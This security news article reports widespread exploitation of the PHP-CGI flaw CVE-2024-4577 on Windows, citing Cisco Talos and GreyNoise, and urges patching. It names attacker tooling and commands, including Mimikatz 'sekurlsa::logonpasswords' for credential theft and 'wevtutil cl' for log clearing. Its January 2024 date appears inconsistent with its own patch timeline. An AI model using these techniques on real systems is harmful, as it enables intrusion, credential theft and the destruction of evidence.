Urgent Patching Advised as CVE-2024-4577 Sees Widespread Exploitation

The identification of active exploitation of PHP vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation on Windows systems, by Cisco Talos in January 2024 against Japanese organizations is supported by GreyNoise telemetry, which corroborates widespread attacks necessitating urgent patching. "While Talos focused on victimology and attacker tradecraft, GreyNoise telemetry reveals a far wider exploitation pattern demanding immediate action from defenders globally," said GreyNoise. Patches for the vulnerability have been available since last year. Cisco Talos observed attacks leveraging this vulnerability, with threat actors focusing primarily on the technology sector, followed by telecommunications, entertainment, education, research, and e-commerce industries. According to Talos, "the attacker's motive extends beyond just credential harvesting, based on our observation of other post-exploitation activities, such as establishing persistence, elevating to SYSTEM level privilege, and potential access to adversarial frameworks, indicating the likelihood of future attacks."

The attack chain begins with the exploitation of CVE-2024-4577 to execute an embedded PowerShell command, triggering a script download from a command-and-control (C2) server. Following initial compromise, the attacker connects to a C2 server over port 8077 and deploys Cobalt Strike for command execution on the victim host. The post-exploitation phase includes reconnaissance commands such as "whoami /all," "dir," and "net time," followed by privilege escalation using JuicyPotato, RottenPotato, and SweetPotato. Additional tools used include "Ladon.exe," a plugin of the “TaoWu” Cobalt Strike kit, for bypassing user access controls. Persistence is achieved through registry modifications with "reg add," specifically adding a beacon executable under the Run registry key.

To evade detection, attackers leveraged various open-source tools such as "sharkTask.exe," "SharpHide.exe," and "SharpStay.exe" to create scheduled tasks, hide registry keys, and establish services, respectively. Log-clearing operations were performed using "wevtutil cl," deleting security, system, application, and Windows PowerShell logs. The threat actors also employed "fscan.exe" from "C:\Windows\Temp" for network scanning and "Seatbelt.exe" to gather system information. Additionally, "SharpGPOAbuse.exe" was used to manipulate Group Policy Objects (GPOs) for further exploitation. Credential theft was executed with Mimikatz through the "sekurlsa::logonpasswords" command.

While the attack methods and tools used in this campaign bear similarities to those associated with the hacker group “Dark Cloud Shield” aka “You Dun,” Cisco Talos has refrained from attributing the activity directly to this group. The attackers leveraged adversarial frameworks hosted on Alibaba Cloud, including pre-configured installer scripts designed to deploy a suite of offensive security tools. Talos warns that the continued exploitation of public-facing applications reflects an ongoing trend in attacker tradecraft. The urgency to patch and mitigate CVE-2024-4577 is critical based on the reported exploitation from both Cisco Talos and GreyNoise.